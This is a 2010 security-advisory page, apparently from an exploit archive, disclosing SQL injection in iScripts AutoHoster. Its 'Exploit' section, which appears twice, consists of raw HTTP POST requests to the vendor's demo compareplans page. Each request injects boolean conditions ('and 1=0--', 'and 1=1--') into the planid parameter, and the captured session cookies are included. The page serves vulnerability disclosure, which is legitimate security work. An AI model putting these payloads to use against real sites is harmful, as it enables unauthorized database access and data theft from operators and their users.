iScripts AutoHoster SQL injection Vulnerabilities

2010.07.02
Credit: Sangteamtham
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

$------------------------------------------------------------------------------------------------------------------- $ iScripts AutoHoster SQL injection Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download : http://www.iscripts.com/autohoster/ $ Date : 02/07/2010 $ Email : sangteamhtham@gmail.com $**************** $Exploit: $ $ Code: **************** Host: www.iscripts.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4 Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster Content-Type: application/x-www-form-urlencoded Content-Length: 82 postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--&domopt=H&ddomain=hcegroup.net&tld=biz **************** Host: www.iscripts.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4 Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster Content-Type: application/x-www-form-urlencoded Content-Length: 82 postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=1--&domopt=H&ddomain=hcegroup.net&tld=biz $**************** $ Greetz to: All Vietnamese hackers and Hackers out there researching for more security $ $ $-------------------------------------------------------------------------------------------------------------------- iScripts AutoHoster.txt $------------------------------------------------------------------------------------------------------------------- $ iScripts AutoHoster SQL injection Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download : http://www.iscripts.com/autohoster/ $ Date : 02/07/2010 $ Email : sangteamhtham@gmail.com $**************** $Exploit: $ $ Code: **************** Host: www.iscripts.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4 Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster Content-Type: application/x-www-form-urlencoded Content-Length: 82 postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--&domopt=H&ddomain=hcegroup.net&tld=biz **************** Host: www.iscripts.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4 Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster Content-Type: application/x-www-form-urlencoded Content-Length: 82 postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=1--&domopt=H&ddomain=hcegroup.net&tld=biz $**************** $ Greetz to: All Vietnamese hackers and Hackers out there researching for more security $ $ $--------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top